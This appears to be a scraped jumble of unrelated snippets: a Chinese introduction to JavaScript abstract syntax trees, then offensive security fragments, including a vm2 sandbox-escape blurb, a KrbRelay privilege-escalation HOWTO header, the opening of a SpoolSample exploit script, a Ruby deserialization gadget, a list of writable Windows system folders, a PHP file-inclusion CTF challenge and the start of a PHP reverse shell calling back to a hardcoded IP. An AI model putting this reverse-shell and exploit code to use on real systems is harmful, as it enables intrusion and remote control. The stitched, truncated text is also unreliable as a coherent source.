AST是Abstract Syntax Tree的缩写,可直译为抽象语法树。AST是对js代码逻辑的一种抽象分解,它把代码的计算逻辑细化,并按计算顺序以树的形式存储。利用AST,我们可以实现很多需求,例如语法高亮、语法检查、代码混淆等,babel就是以AST作为基础对js代码进行处理的。关于AST的操作总结下来无非3种:
- 把js代码解析为AST
- 按照需求修改AST
- 把AST格式化为js代码
好在js生态里已经有成熟的工具帮我们实现
There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside handleException()
which can be used to escape the sandbox and run arbitrary code in host context.
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:
#!/usr/bin/env python | |
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample | |
# some code from https://www.exploit-db.com/exploits/2879/ | |
import os | |
import sys | |
import argparse | |
import binascii | |
import ConfigParser |
Based on excellent write-up from https://www.elttam.com.au/blog/ruby-deserialization/
Doesn't work to use YAML.dump(payload)
in the above script. This only produces the following YAML, which is worthless:
--- !ruby/object:Gem::Requirement
requirements:
- - ">="
- !ruby/object:Gem::Version
version: '0'
c:\windows\system32\microsoft\crypto\rsa\machinekeys | |
c:\windows\system32\tasks_migrated\microsoft\windows\pla\system | |
c:\windows\syswow64\tasks\microsoft\windows\pla\system | |
c:\windows\debug\wia | |
c:\windows\system32\tasks | |
c:\windows\syswow64\tasks | |
c:\windows\tasks | |
c:\windows\registration\crmlog | |
c:\windows\system32\com\dmp | |
c:\windows\system32\fxstmp |
import base64 | |
import re | |
import xml.dom.minidom | |
import json | |
import uuid | |
import struct | |
import string | |
import random | |
import hashlib | |
import time |
The challenge was to achieve RCE with this file:
<?php ($_GET['action'] ?? 'read' ) === 'read' ? readfile($_GET['file'] ?? 'index.php') : include_once($_GET['file'] ?? 'index.php');
Some additional hardening was applied to the php installation to make sure that previously known solutions wouldn't work (for further information read this writeup from the challenge author).
I didn't solve the challenge during the competition - here is a writeup from someone who did - but since the idea I had differed from the techniques used in the published writeups I read (and I thought it was cool :D), here is my approach.
<?php | |
set_time_limit (0); | |
$VERSION = "1.0"; | |
$ip = '10.10.14.12'; // CHANGE THIS | |
$port = 1234; // CHANGE THIS | |
$chunk_size = 1400; | |
$write_a = null; | |
$error_a = null; | |
$shell = 'uname -a; w; id; /bin/sh -i'; |